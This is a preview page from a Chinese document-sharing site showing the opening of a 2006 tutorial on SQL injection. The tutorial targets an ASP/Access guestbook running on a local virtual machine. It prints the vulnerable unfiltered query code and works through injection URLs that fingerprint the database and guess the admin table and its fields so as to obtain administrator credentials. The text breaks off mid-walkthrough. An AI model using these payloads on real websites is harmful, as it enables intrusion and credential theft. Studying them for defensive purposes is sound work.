sql注入攻击技术初探

sql注入攻击技术初探

ID:18216345

大小:7.68 MB

页数:46页

时间:2018-09-15

sql注入攻击技术初探_第1页
sql注入攻击技术初探_第2页
sql注入攻击技术初探_第3页
sql注入攻击技术初探_第4页
sql注入攻击技术初探_第5页
资源描述:

《sql注入攻击技术初探》由会员上传分享,免费在线阅读,更多相关内容在教育资源-天天文库

1、Sql注入攻击技术初探整理:BlackhumorSite:www.hack41.cn2006.6.19完稿简介:sql注入一般针对基于web平台的应用程序由于很多时候程序员在编写程序的时候没有对浏览器端提交的参数进行合法的判断,可以由用户自己修改构造参数(也可以是sql查询语句),并传递至服务器端获取想要的敏感信息甚至执行危险代码和系统命令就形成了sql注入漏洞,时至今日任然有很大一部分网站存在sql注入漏洞,可想而知sql注入攻击的危害,下面就目前sql注入攻击技术进行总结,让我们更加了解这种攻击与防御方法一、access数据库注入攻

2、击技术目前国内很大一部分网站都是采用asp+access搭建成的本文演示网站是在虚拟机搭建的一套留言板程序http://192.168.80.128:8181/bbs/index.asp(留言板首页)点击公告连接此时注意观察地址栏http://192.168.80.128:8181/bbs/gshow.asp?id=1Gshow.asp后面跟了一个id参数,其值为数字1,下面我们来看一下服务器端的gshow.asp中的读取公告内容的代码<%setrs=server.CreateObject("adodb.recordset")sql="

3、select*fromgonggaowhereid="&request.QueryString("id")rs.opensql,conn,1,3ifrs.eoforrs.bofthenresponse.write("暂无公告内容")else%><%=rs("titles")%>
<%=rs("content")%><%=rs("addtime")%>

<%endifrs.closesetrs=nothing%>可以很明显的看到程序在接收到浏览器端传递过来的id参数时,没有经过任何过

4、滤就直接进入数据接查询了,那么我们怎么来通过这个漏洞来获取我们想要的信息呢,测试之前我们是不知道对方所使用的数据库类型也不知道数据库里面有哪些表、字段等等(类似blackboxtest),一般情况下asp可以与access和mssql数据库结合,首先我们来判断一下数据库类型在id参数后面加上andexists(select*frommsysobjects)注:mysysobjects是access的系统表完整的测试语句:http://192.168.80.128:8181/bbs/gshow.asp?id=1andexists(sele

5、ct*frommsysobjects)回车提交到服务器端如图,根据服务器返回结果,(MicrosoftJETDatabaseEngine错误'80040e09'不能读取记录;在'msysobjects'上没有读取数据权限。/bbs/gshow.asp,行11)说明存在msysobjects表,也就是说后台是采用的access数据库(若服务器返回[Microsoft][ODBCSQLServerDriver][SQLServer]对象名'msysobjects'无效。则说明是sqlserver数据库,相关方法会在下面讲述,这里重点讨论ac

6、cess数据库)下面我们来进一步获取我们想要的信息一般网站重要的信息就是后台管理员登陆帐号密码了,我们提交http://192.168.80.128:8181/bbs/gshow.asp?id=1andexists(select*fromusers)(判断数据库中是否存在users表)根据图中返回结果提示users表不存在,那么我们继续来提交http://192.168.80.128:8181/bbs/gshow.asp?id=1andexists(select*fromadmin服务器端返回的数据和http://192.168.80.

7、128:8181/bbs/gshow.asp?id=1一样这是因为参数一起带入数据库里面就变成了select*fromgonggaowhereid=1andexists(select*fromadmin)由于存在admin表条件成立就和select*fromgonggaowhereid=1的查询返回结果一样了,找到了admin表现在就以此类推猜测字段提交http://192.168.80.128:8181/bbs/gshow.asp?id=1andexists(selectuserfromadmin)服务器返回”至少一个参数没有被指定值

8、”说明不存在user字段,继续提交http://192.168.80.128:8181/bbs/gshow.asp?id=1andexists(selectadminfromadmin)服务器返回正常,说明

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。
相关标签